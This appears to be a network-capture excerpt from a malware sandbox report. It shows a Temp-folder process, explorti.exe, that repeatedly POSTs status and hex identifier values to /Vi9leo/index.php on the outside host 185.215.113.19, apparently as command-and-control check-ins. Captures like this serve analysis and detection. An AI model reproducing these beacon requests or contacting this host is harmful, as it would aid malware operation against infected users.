Jul 26, 2024 21:04:17.432885885 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:17.679668903 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	56733	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:17.841272116 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:18.616157055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:18.616918087 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:18.867109060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	56734	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:18.982214928 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:19.776700020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:19.777502060 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:20.094575882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	56736	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:20.223192930 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:21.623913050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:21.626487970 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:21.627491951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:21.628906012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:21.888231039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	56737	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:21.997720003 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:22.774511099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:22.775187969 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:23.063530922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	56738	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:23.185091019 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:23.963273048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:23.963886976 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:24.216413975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	56739	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:24.343425035 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:25.119050026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:25.119983912 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:25.378475904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	56740	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:25.497910976 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:26.321660995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:26.322424889 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:26.571166039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	56741	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:26.853394985 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:27.739897013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:27.740966082 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:27.988502026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	56742	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:28.107878923 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:28.896280050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:28.897192001 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:29.144112110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	56743	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:29.264136076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:30.015011072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:30.015888929 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:30.263047934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	56744	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:30.377094984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:31.134143114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:04:31.135096073 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:04:31.383564949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	56745	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:04:31.500416994 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:04:32.283133984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
